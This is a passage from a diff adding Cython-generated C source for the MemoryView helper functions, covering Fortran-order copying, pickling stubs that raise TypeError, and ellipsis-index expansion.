__pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_src), ((char *)"fortran"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_F_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 653, __pyx_L1_error) + __pyx_v_dst = __pyx_t_1; + + /* "View.MemoryView":658 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &dst) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_dst)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy_fortran", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryview___reduce_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryview_2__setstate_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + +static PyObject *__pyx_memoryview_new(PyObject *__pyx_v_o, int __pyx_v_flags, int __pyx_v_dtype_is_object, __Pyx_TypeInfo *__pyx_v_typeinfo) { + struct __pyx_memoryview_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_cwrapper", 0); + + /* "View.MemoryView":663 + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) # <<<<<<<<<<<<<< + * result.typeinfo = typeinfo + * return result + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_o); + __Pyx_GIVEREF(__pyx_v_o); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_o); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":664 + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_v_result->typeinfo = __pyx_v_typeinfo; + + /* "View.MemoryView":665 + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_check') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *__pyx_v_o) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("memoryview_check", 0); + + /* "View.MemoryView":669 + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: + * return isinstance(o, memoryview) # <<<<<<<<<<<<<< + * + * cdef tuple _unellipsify(object index, int ndim): + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_o, __pyx_memoryview_type); + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + +static PyObject *_unellipsify(PyObject *__pyx_v_index, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_idx; + PyObject *__pyx_v_tup = NULL; + PyObject *__pyx_v_result = NULL; + int __pyx_v_have_slices; + int __pyx_v_seen_ellipsis; + PyObject *__pyx_v_item = NULL; + Py_ssize_t __pyx_v_nslices; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_UCS4 __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_unellipsify", 0); + + /* "View.MemoryView":677 + * """ + * cdef Py_ssize_t idx + * tup = index if isinstance(index, tuple) else (index,) # <<<<<<<<<<<<<< + * + * result = [slice(None)] * ndim + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_index); + if (__pyx_t_2) { + __Pyx_INCREF(((PyObject*)__pyx_v_index)); + __pyx_t_1 = __pyx_v_index; + } else { + __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 677, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_index); + __Pyx_GIVEREF(__pyx_v_index); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_index); + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } + __pyx_v_tup = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_t_1 = PyList_New(1 * ((__pyx_v_ndim<0) ? 0:__pyx_v_ndim)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + { Py_ssize_t __pyx_temp; + for (__pyx_temp=0; __pyx_temp < __pyx_v_ndim; __pyx_temp++) { + __Pyx_INCREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + PyList_SET_ITEM(__pyx_t_1, __pyx_temp, __pyx_slice__5); + } + } + __pyx_v_result = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":680 + * + * result = [slice(None)] * ndim + * have_slices = False # <<<<<<<<<<<<<< + * seen_ellipsis = False + * idx = 0 + */ + __pyx_v_have_slices = 0; + + /* "View.MemoryView":681 + * result = [slice(None)] * ndim + * have_slices = False + * seen_ellipsis = False # <<<<<<<<<<<<<< + * idx = 0 + * for item in tup: + */ + __pyx_v_seen_ellipsis = 0; + + /* "View.MemoryView":682 + * have_slices = False + * seen_ellipsis = False + * idx = 0 # <<<<<<<<<<<<<< + * for item in tup: + * if item is Ellipsis: + */ + __pyx_v_idx = 0; + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(1, 683, __pyx_L1_error) + } + __pyx_t_1 = __pyx_v_tup; __Pyx_INCREF(__pyx_t_1); __pyx_t_4 = 0; + for (;;) { + if (__pyx_t_4 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(1, 683, __pyx_L1_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_1, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 683, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + __pyx_t_2 = (__pyx_v_item == __pyx_builtin_Ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + __pyx_t_2 = (!__pyx_v_seen_ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":686 + * if item is Ellipsis: + * if not seen_ellipsis: + * idx += ndim - len(tup) # <<<<<<<<<<<<<< + * seen_ellipsis = True + * have_slices = True + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 686, __pyx_L1_error) + } + __pyx_t_5 = PyTuple_GET_SIZE(__pyx_v_tup); if (unlikely(__pyx_t_5 == ((Py_ssize_t)-1))) __PYX_ERR(1, 686, __pyx_L1_error) + __pyx_v_idx = (__pyx_v_idx + (__pyx_v_ndim - __pyx_t_5)); + + /* "View.MemoryView":687 + * if not seen_ellipsis: + * idx += ndim - len(tup) + * seen_ellipsis = True # <<<<<<<<<<<<<< + * have_slices = True + * else: + */ + __pyx_v_seen_ellipsis = 1; + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + } + + /* "View.MemoryView":688 + * idx += ndim - len(tup) + * seen_ellipsis = True + * have_slices = True # <<<<<<<<<<<<<< + * else: + * if isinstance(item, slice): + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + /*else*/ { + __pyx_t_2 = PySlice_Check(__pyx_v_item); + if (__pyx_t_2) { + + /* "View.MemoryView":691 + * else: + * if isinstance(item, slice): + * have_slices = True # <<<<<<<<<<<<<< + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + goto __pyx_L7; + } + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + __pyx_t_2 = (!(PyIndex_Check(__pyx_v_item) != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":693 + * have_slices = True + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" # <<<<<<<<<<<<<< + * result[idx] = item + * idx += 1 + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = 0; + __pyx_t_6 = 127; + __Pyx_INCREF(__pyx_kp_u_Cannot_index_with_type); + __pyx_t_5 += 24; + __Pyx_GIVEREF(__pyx_kp_u_Cannot_index_with_type); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Cannot_index_with_type); + __pyx_t_7 = __Pyx_PyObject_FormatSimple(((PyObject *)Py_TYPE(__pyx_v_item)), __pyx_empty_unicode); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __Pyx_INCREF(__pyx_kp_u__6); + __pyx_t_5 += 1; + __Pyx_GIVEREF(__pyx_kp_u__6); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__6); + __pyx_t_7 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_5, __pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_t_7, 0, 0); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __PYX_ERR(1, 693, __pyx_L1_error) + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + } + __pyx_L7:; + + /* "View.MemoryView":694 + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item # <<<<<<<<<<<<<< + * idx += 1 + * + */ + if (unlikely((__Pyx_SetItemInt(__pyx_v_result, __pyx_v_idx, __pyx_v_item, Py_ssize_t, 1, PyInt_FromSsize_t, 1, 1, 1) < 0))) __PYX_ERR(1, 694, __pyx_L1_error) + } + __pyx_L5:; + + /* "View.MemoryView":695 + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + * idx += 1 # <<<<<<<<<<<<<< + * + * nslices = ndim - idx + */ + __pyx_v_idx = (__pyx_v_idx + 1); + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":697 + * idx += 1 + * + * nslices = ndim - idx # <<<<<<<<<<<<<< + * return have_slices or nslices, tuple(result) + * + */ + __pyx_v_nslices = (__pyx_v_ndim - __pyx_v_idx); + + /* "View.MemoryView":698 + * + * nslices = ndim - idx + * return have_slices or nslices, tuple(result) # <<<<<<<<<<<<<< + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + */ + __Pyx_XDECREF(__pyx_r); + if (!__pyx_v_have_slices) { + } else { + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_have_slices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_7 = PyInt_FromSsize_t(__pyx_v_nslices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + __pyx_L9_bool_binop_done:; + __pyx_t_7 = PyList_AsTuple(__pyx_v_result); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_7 = 0; + __pyx_r = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView._unellipsify", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_tup); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + +static int assert_direct_dimensions(Py_ssize_t *__pyx_v_suboffsets, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_suboffset; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assert_direct_dimensions", 0); + + /* "View.MemoryView":701 + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + */ + __pyx_t_2 = (__pyx_v_suboffsets + __pyx_v_ndim); + for (__pyx_t_3 = __pyx_v_suboffsets; __pyx_t_3 < __pyx_t_2; __pyx_t_3++) { + __pyx_t_1 = __pyx_t_3; + __pyx_v_suboffset = (__pyx_t_1[0]); + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + __pyx_t_4 = (__pyx_v_suboffset >= 0); + if (unlikely(__pyx_t_4)) { + + /* "View.MemoryView":703 + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" # <<<<<<<<<<<<<< + * return 0 # return type just used as an error flag + * + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Indirect_dimensions_not_supporte, 0, 0); + __PYX_ERR(1, 703, __pyx_L1_error) + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * 